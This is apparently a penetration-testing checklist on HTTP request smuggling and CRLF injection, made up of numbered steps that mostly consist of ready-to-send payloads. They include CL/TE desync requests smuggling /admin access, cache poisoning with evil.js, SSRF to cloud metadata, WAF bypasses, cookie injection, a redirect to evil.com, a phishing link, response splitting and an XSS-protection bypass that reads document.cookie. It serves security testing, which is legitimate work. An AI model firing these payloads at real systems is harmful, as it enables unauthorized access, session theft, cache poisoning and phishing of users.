HTTP Splitting Smuggling

Check List

Methodology

Black Box

HRS With Content-Length And Transfer-Encoding

1

Inject conflicting Content-Length and Transfer-Encoding headers to test for desync

POST /path HTTP/1.1
Host: target.com
Content-Length: 50
Transfer-Encoding: chunked

0
GET /admin HTTP/1.1

2

Check if the response indicates the backend processed the smuggled GET /admin request

---

HTTP/2 To HTTP/1.1 Downgrade

1

If the site supports HTTP/2, force a downgrade to HTTP/1.1 with a smuggling payload

POST /path HTTP/2
Host: target.com
Transfer-Encoding: chunked
Transfer-Encoding: chunked

0
GET /admin HTTP/1.1

2

Verify if the backend executes the smuggled GET /admin request

---

Multi-Chunked Smuggling

1

Inject multiple Transfer-Encoding headers to confuse proxy parsing

POST /path HTTP/1.1
Host: target.com
Transfer-Encoding: chunked
Transfer-Encoding: chunked

0
GET /admin HTTP/1.1

2

Check if the smuggled request is processed by the backend

---

Invalid TE Header Manipulation

1

Use malformed Transfer-Encoding headers to bypass validation

POST /path HTTP/1.1
Host: vulnerable.com
Transfer-Encoding: cHuNkEd
Content-Length: 60

0
GET /admin HTTP/1.1

2

Verify if the response includes evidence of the smuggled request

---

Cache Poisoning With HRS

1

Inject a payload to poison the CDN cache

POST /path HTTP/1.1
Host: target.com
Transfer-Encoding: chunked
Content-Length: 60

0
GET /index.html HTTP/1.1
X-Cache-Inject: evil.js

2

Check if the cache serves evil.js to subsequent users

---

SSRF With HRS

1

Smuggle a payload to access internal services

POST /path HTTP/1.1
Host: target.com
Transfer-Encoding: chunked
Content-Length: 60

0
GET http://169.254.169.254/latest/meta-data/ HTTP/1.1

2

Verify if the response contains internal metadata (AWS metadata)

---

WAF Bypass With HRS

1

Split payloads to evade WAF detection

POST /path HTTP/1.1
Host: target.com
Transfer-Encoding: chunked
X-Bypass: evasion

0
GET /secret HTTP/1.1

2

Check if the smuggled request bypasses the WAF and reaches the backend

---

Blind HRS

1

Inject a time-delayed payload to detect blind smuggling

POST /path HTTP/1.1
Host: target.com
Transfer-Encoding: chunked
Content-Length: 40

0
GET /admin HTTP/1.1

2

Measure response delays to infer smuggling success

---

Multi-Hop Proxy Smuggling

1

Inject payloads across a chain of proxies (CDN → Load Balancer → Backend)

POST /path HTTP/1.1
Host: target.com
Transfer-Encoding: chunked
Content-Length: 60

0
GET /admin HTTP/1.1

2

Trace the smuggled request across each hop and check for discrepancies in processing

---

Basic CRLF Injection

1

Modify the query parameter by injecting a CRLF sequence to add a custom header

GET /page?input=home%0d%0aSet-Cookie:crlf=injected

2

Check the response headers for the injected Set-Cookie: crlf=injected. If present, the endpoint is vulnerable

The important thing is that if you inject the payload and get a 400 in response, it can indicate that the server is vulnerable, but if it gives a 404 in response, it means that the server is not vulnerable

---

Cookie Injection

1

Inject a CRLF sequence to manipulate cookies

GET /page?input=home%0d%0aSet-Cookie:hacked=true

2

Verify if the response includes the injected cookie (hacked=true) or affects session behavior

---

Redirection/phishing

1

CRLF Injection can be used to inject links that redirect users to phishing sites

%0d%0a%0d%0a%3CA%20HREF%3D%22https%3A%2F%2Fexample.com%2F%22%3ELogin%20Here%20%3C%2FA%3E%0A%0A

2

Observe if the browser redirects to phishing page

---

Open Redirect

1

Inject a Location header to redirect to a malicious site

GET /page?input=home%0d%0aLocation:https://evil.com

2

Observe if the browser redirects to https://evil.com

---

HTTP Response Splitting

1

By injecting %0d%0a (Carriage Return + Line Feed), an attacker can split the server’s HTTP response into two parts. This enables manipulation of headers and body content in unexpected ways

/vulnerable-endpoint?q=abc%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type:text/html%0d%0a%0d%0a<script>alert('Unk9vvN!')</script>

2

%0d%0a → Ends the current header line and A new HTTP/1.1 200 OK response starts with a malicious script in the body

---

Test XSS Protection Bypass

1

Inject a payload to disable XSS protections and execute JavaScript

GET /page?input=home%0d%0aX-XSS-Protection:0%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E

2

Verify if the response includes X-XSS-Protection: 0 and the script executes

---

Test GBK-Encoded CRLF Bypass

1

If standard CRLF payloads are blocked, use GBK-encoded characters

GET /page?input=home%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=unk9vvn

2

Check if the response includes the injected Set-Cookie: crlfinjection=unk9vvn

---

CRLF Injection Using cURL

1

Test for CRLF Injection using cURL

curl -I "https://target.com/page?input=home%0d%0aSet-Cookie:crlf=injected"

2

Check the response headers for set-cookie: crlf=injected

HTTP/2 301
date: Mon, 12 May 2025 12:46:42 GMT
content-type: text/html
location: https://example.com/
set-cookie: crlf=injected; -> vulnerability

---

CRLF Header Injection Via "redirect_uri" Parameter

1

Log in to the target site and review the authentication process

2

Then check whether the authentication process is performed using Oauth or not

3

If Oauth is used then get the redirect_uri parameter in the Burp Suite request and send it to the repeater

4

Then test the CRLF Injection tests in this parameter, like below

https://subdomain.example.com/oauth/authorize?client_id=&redirect_uri=%0d%0axxx:something&response_type=code

5

Then send the request and inspect the HTTP responses. If you see the following injected value, the vulnerability is confirmed

location: xxx:something?error=invalid_scope

---

White Box

Cheat Sheet